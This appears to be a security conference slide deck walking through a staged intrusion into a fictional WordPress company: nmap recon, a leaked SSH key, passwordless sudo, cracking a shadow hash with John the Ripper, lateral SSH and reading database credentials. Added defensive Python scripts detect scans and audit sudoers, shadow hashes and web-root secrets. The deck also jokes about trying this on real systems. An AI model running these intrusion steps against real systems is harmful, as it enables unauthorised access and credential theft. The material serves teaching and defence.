Who is this person?
- Etsy security team.
- Spoke here last year (everything broke, never do live demos!)
- Been typing on computers for coins for 15+ years.
You will need:
- A web browser (we'll assume you have one of these!)
- An SSH client.
  - Unix/Mac: you already have ssh, it's the best.
  - Windows: PuTTY.
- nmap: www.nmap.org (optional)
No really, what are we talking about today?
- How you actually hax into real live companies.
- Reconnaissance into systems.
- Lateral movement between systems.
- REAL LIFE HOW SYSTEMS GET HACKED.
- (you can go do this on real live systems, regrettably [1])

[1] May be illegal. Ask a grown-up/lawyer/use a coffee shop.
Targeting evil corporations
I have preselected a target as we are time limited: Evil Mega Corp, http://www.evilmegacorp.co/
Go look at their website, they're real evil...
Recon! Nmap!
- Download it at www.nmap.org
- Security tool that everyone uses.
- Makes a TCP/IP connection to each port on the target host and reports what is listening at the other end (service and, often, version).
- (can do cool stuff like run scripts against it)
nmap
  $ nmap -F -T4 -A www.evilmegacorp.co
  Starting Nmap 6.47 ( http://nmap.org )
  Nmap scan report for www.evilmegacorp.co (45.55.197.171)
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
  |_http-generator: WordPress 4.2.3
  | http-robots.txt: 1 disallowed entry
  |_/
  |_http-title: Evil Mega Corp | The most evil of mega corporations
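The flip side of the scan above is what it looks like from the target's firewall log. The following is an added example, not material from the talk: it parses constructed iptables-style LOG lines (the format and sample addresses are assumptions) and flags any source that touches many distinct destination ports inside a short window, which is the footprint an `nmap -F` run leaves behind. A normal client hammering port 80 and 443 is deliberately included so the check does not fire on it.

```python
"""Flag likely port scans in iptables-style firewall log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Matches the parts we need from a line produced by `iptables -j LOG` (assumed layout).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def _line(sec, src, dpt):
    """Build one constructed log line; the year is not logged by syslog, so we fix it below."""
    return (f"Jul 26 03:01:{sec:02d} www kernel: [1234.5] IN=eth0 OUT= "
            f"SRC={src} DST=45.55.197.171 PROTO=TCP SPT=51000 DPT={dpt} SYN")


# Constructed sample: one host probing 12 ports in 12 seconds, one normal client
# hitting only 80/443 for half a minute.
SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 8080]
SAMPLE_LOG = [_line(s, "203.0.113.9", p) for s, p in enumerate(SCAN_PORTS)]
SAMPLE_LOG += [_line(s, "198.51.100.4", 80 if s % 2 else 443) for s in range(30)]


def parse_line(line, year=2015):
    """Return (timestamp, source ip, destination port) or None for unrelated lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])


def find_scanners(lines, window_seconds=60, min_ports=10):
    """Map each suspicious source to the sorted set of ports it touched.

    A source is suspicious when any window of `window_seconds` contains
    connection attempts to at least `min_ports` distinct destination ports.
    """
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            ts, src, dpt = parsed
            events[src].append((ts, dpt))

    scanners = {}
    for src, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # Slide the window start forward until it spans at most window_seconds.
            while (evs[hi][0] - evs[lo][0]).total_seconds() > window_seconds:
                lo += 1
            if len({dpt for _, dpt in evs[lo:hi + 1]}) >= min_ports:
                scanners[src] = sorted({dpt for _, dpt in evs})
                break
    return scanners


if __name__ == "__main__":
    for src, ports in find_scanners(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {len(ports)} ports {ports}")
```

Tune `window_seconds` and `min_ports` to the host: a busy web server sees many sources on two or three ports, a scan sees one source on dozens. Feeding this from a real log means only changing the year handling and the regex, which is why both are kept in one place.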
More recon
Maybe there's something else, never give up. Let's go look at their website.
http://blog.evilmegacorp.co/about-us/
(Hint: I think Dave has a useful link)
  $ ssh -i ~/Downloads/id_rsa.txt [email protected]
  Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-57-generic x86_64)

   * Documentation:  https://help.ubuntu.com/

    System information as of Sun Jul 26 03:02:12 EDT 2015

    System load:  0.0               Processes:           67
    Usage of /:   9.2% of 19.56GB   Users logged in:     0
    Memory usage: 14%               IP address for eth0: 104.236.53.106
    Swap usage:   0%                IP address for eth1: 10.132.233.155

  dave@boing:~$ cat .bash_history
  id
  ls
  ls -la
  vi .bash_profile
  ssh 10.132.236.169
  dave@boing:~$
Cool story, now what can I do?
  dave@boing:~$ sudo -ln
  ....
  User dave may run the following commands on boing:
      (root) NOPASSWD: ALL
WAIT WHAT? I can run sudo -s to get root WITH NO PASSWORD! COOL!
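What `sudo -l` showed above is a one-line sudoers mistake, and it is easy to catch before an attacker does. This added example (not from the talk) parses sudoers-style rules from two constructed files, the weak one with Dave's `NOPASSWD: ALL` entry and a tightened one that grants only the specific commands Dave's job needs, and rates each rule. The sample rules and the simplified grammar it accepts are assumptions; a real audit should feed it the output of `sudo -l -U user` or `visudo -c` rather than parsing every sudoers extension.

```python
"""Rate sudoers rules by how much unauthenticated privilege they hand out (added example)."""
import re

# Simplified sudoers rule: who host=(runas) [TAG:...] cmd[, cmd...]  (assumed subset of the grammar)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample: the rule seen on "boing" in the slide above.
WEAK_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
dave    ALL=(root) NOPASSWD: ALL
"""

# Constructed sample: same host with Dave limited to the two commands he actually runs.
HARDENED_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
dave    ALL=(root) /usr/sbin/service apache2 restart, /usr/bin/tail /var/log/apache2/error.log
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""


def audit_sudoers(text):
    """Return a list of (user, rule, reason) for rules worth a second look."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                                  # aliases etc. are outside this subset
        nopasswd = "NOPASSWD" in m["tags"]
        cmds = [c.strip() for c in m["cmds"].split(",")]
        if "ALL" in cmds and nopasswd:
            findings.append((m["who"], line, "passwordless root via any command"))
        elif "ALL" in cmds and m["who"] != "root":
            findings.append((m["who"], line, "unrestricted command set (password still required)"))
        elif nopasswd:
            findings.append((m["who"], line, "passwordless, but limited to: " + ", ".join(cmds)))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_SUDOERS), ("hardened", HARDENED_SUDOERS)):
        print(f"== {label} ==")
        for who, rule, reason in audit_sudoers(text):
            print(f"  {who:8} {reason}\n           {rule}")
```

The hardened file still produces one finding for the `backup` account, which is the point: a passwordless rule is acceptable only when the command list is short and the commands cannot spawn a shell or write arbitrary files.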
Password cracking 101
  root@boing:~# egrep 'dave:' /etc/shadow
  dave:$1$heh$lZPrLI4ejKHiH6/okTMBQ.:16639:0:99999:7:::

Further reading:
- John the Ripper docs.
- hashcat, which is similar but newer.
- Ars Technica article on how to crack passwords.
- SkullSecurity wiki page on passwords.
John the Ripper
You give john a big list of words; it will try them all and see if any match.
  root@boing:~# rm -f /root/.john/john.pot
  root@boing:~# john --wordlist=/usr/share/dict/wordlist.txt /etc/shadow
  Loaded 1 password hash (md5crypt [MD5 32/64 X2])
  Press 'q' or Ctrl-C to abort, almost any other key for status
  yay dogs         (dave)
  1g 0:00:00:27 100% 0.03673g/s 10733p/s 10733c/s 10733C/s yay dogs
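Two things made that crack take 27 seconds: a dictionary password and md5crypt, a 1990s hash that john runs at ten thousand guesses a second on one core. The defender's check is to find such hashes before the password gets guessed. This is an added example, not from the talk: it parses a constructed `/etc/shadow` (Dave's line is the one shown on the slide; the other accounts and the root hash are made up) and reports each account's hash algorithm, salt and last change date, flagging md5crypt, DES crypt and empty password fields.

```python
"""Audit /etc/shadow password fields for weak hash algorithms (added example)."""
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)          # field 3 of shadow is days since this date

# Modular-crypt prefixes and how a 2015-era host should rate them.
HASH_PREFIXES = {
    "$1$": ("md5crypt", "weak"),
    "$2a$": ("bcrypt", "ok"),
    "$2b$": ("bcrypt", "ok"),
    "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256crypt", "ok"),
    "$6$": ("sha512crypt", "ok"),
    "$7$": ("scrypt", "ok"),
    "$y$": ("yescrypt", "ok"),
}

# Constructed sample shadow file; only dave's line is from the slide.
SAMPLE_SHADOW = """\
root:$6$rounds=5000$c0nstructed$Zk0H.9/ujV3.fake.hash.for.example.only:16639:0:99999:7:::
dave:$1$heh$lZPrLI4ejKHiH6/okTMBQ.:16639:0:99999:7:::
sshd:*:16450:0:99999:7:::
daemon:!:16450:0:99999:7:::
legacy:AbCdEfGhIjKlM:15000:0:99999:7:::
guest::16639:0:99999:7:::
"""


def classify_hash(field):
    """Return (algorithm, rating, salt) for one shadow password field."""
    if field == "":
        return ("none", "weak", None)            # empty field: login with no password at all
    if field[0] in "!*":
        return ("locked", "n/a", None)           # no password login possible
    for prefix, (name, rating) in HASH_PREFIXES.items():
        if field.startswith(prefix):
            salt = None
            parts = field.split("$")             # ['', '1', 'salt', 'hash'] or with 'rounds=N'
            if prefix in ("$1$", "$5$", "$6$") and len(parts) >= 4:
                salt = parts[3] if parts[2].startswith("rounds=") else parts[2]
            return (name, rating, salt)
    if len(field) == 13 and "$" not in field:
        return ("descrypt", "weak", field[:2])   # traditional DES crypt, 2-char salt, 8-char max
    return ("unknown", "review", None)


def audit_shadow(text):
    """Map user -> details for every account line in shadow-format text."""
    report = {}
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) < 3:
            continue
        user, pw_field, last_change = fields[0], fields[1], fields[2]
        algorithm, rating, salt = classify_hash(pw_field)
        report[user] = {
            "algorithm": algorithm,
            "rating": rating,
            "salt": salt,
            "last_changed": EPOCH + timedelta(days=int(last_change)) if last_change.isdigit() else None,
        }
    return report


def weak_accounts(report):
    """Accounts whose password field should be rehashed or locked."""
    return sorted(user for user, r in report.items() if r["rating"] == "weak")


if __name__ == "__main__":
    rep = audit_shadow(SAMPLE_SHADOW)
    for user, r in rep.items():
        print(f"{user:8} {r['algorithm']:12} {r['rating']:6} salt={r['salt']} changed={r['last_changed']}")
    print("rehash or lock:", weak_accounts(rep))
```

Moving a user off md5crypt means setting `ENCRYPT_METHOD SHA512` (or yescrypt on newer systems) in `/etc/login.defs` and forcing a password change, since an existing hash cannot be converted without the plaintext. The salt column is there because md5crypt's short salt (`heh`, three characters) is part of why precomputed wordlists work so well against it.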
HACK THE GIBSON
Using the .ssh/known_hosts trickery from before combined with the password, what do we get?
  dave@boing:~$ cat .ssh/known_hosts
  10.132.236.169 ecdsa-sha2-nistp256 AAAAE2VjZ....
  dave@boing:~$ ssh 10.132.236.169
  dave@10.132.236.169's password:
  [email protected]:~$ id
  uid=1000(dave) gid=1000(dave) groups=1000(dave)
I wonder...
  [email protected]:~$ cd /var/www/html/
  [email protected]:/var/www/html$ ls -oh wp-config.php
  -rw-r--r-- 1 www-data 2.7K Jul 22 16:22 wp-config.php
Wait, we can read the config file!?
MAD HAX
  [email protected]:~$ grep DB_ /var/www/html/wp-config.php
  define('DB_NAME', 'wordpress');
  define('DB_USER', 'wordpress');
  define('DB_PASSWORD', 'QNqJgIJD39');
  define('DB_HOST', 'localhost');
  ...
So now we have the database password!
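Both of the big breaks in this walkthrough, Dave's private key sitting under the website and a world-readable `wp-config.php`, are file problems in a web root. This added example (not from the talk, and not WordPress's own tooling) builds a small constructed web root in a temporary directory, scans it for secret files that any local user can read and for files containing private key material, then tightens the permissions on the config file and scans again. The file names it treats as sensitive and the fixture layout are assumptions; on a real host point `scan_webroot` at `/var/www/html`.

```python
"""Find readable secrets and private keys under a web root (added example)."""
import os
import stat
import tempfile
from pathlib import Path

# File names that hold credentials and should never be world-readable (assumed list).
SENSITIVE_NAMES = {"wp-config.php", "config.php", ".env", ".htpasswd"}
KEY_MARKER = b"PRIVATE KEY-----"          # present in every PEM-encoded private key
MAX_SCAN_BYTES = 64 * 1024                # keys are small; skip scanning big uploads


def scan_webroot(root):
    """Return sorted (relative path, reason) findings for files under `root`."""
    findings = []
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = str(path.relative_to(root))
        st = path.stat()
        if path.name in SENSITIVE_NAMES and st.st_mode & stat.S_IROTH:
            findings.append((rel, "world-readable secret file"))
        if st.st_size <= MAX_SCAN_BYTES:
            with path.open("rb") as fh:
                if KEY_MARKER in fh.read():
                    findings.append((rel, "private key material in web root"))
    return sorted(findings)


def tighten(root):
    """Remove the world-readable bit from flagged secret files (owner rw, group r)."""
    for rel, reason in scan_webroot(root):
        if reason.startswith("world-readable"):
            os.chmod(Path(root, rel), 0o640)


def build_fixture():
    """Create a constructed web root reproducing the two findings from the slides."""
    root = tempfile.mkdtemp(prefix="webroot-")
    cfg = Path(root, "wp-config.php")
    cfg.write_text("<?php\ndefine('DB_PASSWORD', 'constructed-sample');\n")
    cfg.chmod(0o644)                      # the -rw-r--r-- seen in the slide
    key = Path(root, "about-us", "id_rsa.txt")
    key.parent.mkdir()
    key.write_text("-----BEGIN RSA PRIVATE KEY-----\n"
                   "CONSTRUCTED PLACEHOLDER, NOT A REAL KEY\n"
                   "-----END RSA PRIVATE KEY-----\n")
    key.chmod(0o644)
    Path(root, "index.php").write_text("<?php echo 'hello';\n")
    return root


if __name__ == "__main__":
    root = build_fixture()
    print("before:", scan_webroot(root))
    tighten(root)
    print("after: ", scan_webroot(root))
```

The second scan still reports the key file on purpose: a private key that has been served from a website cannot be fixed with chmod. It has to be removed from the web root and, more importantly, revoked everywhere it is an authorized key, because anyone may already have a copy. For `wp-config.php`, 0640 owned by the web server's group is enough for Apache to read it while other local accounts like `dave` cannot.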
I've got the key, I've got the secret
  mysql -Dwordpress -uwordpress -pQNqJgIJD39
You now have full control of the database for all of WordPress for the site.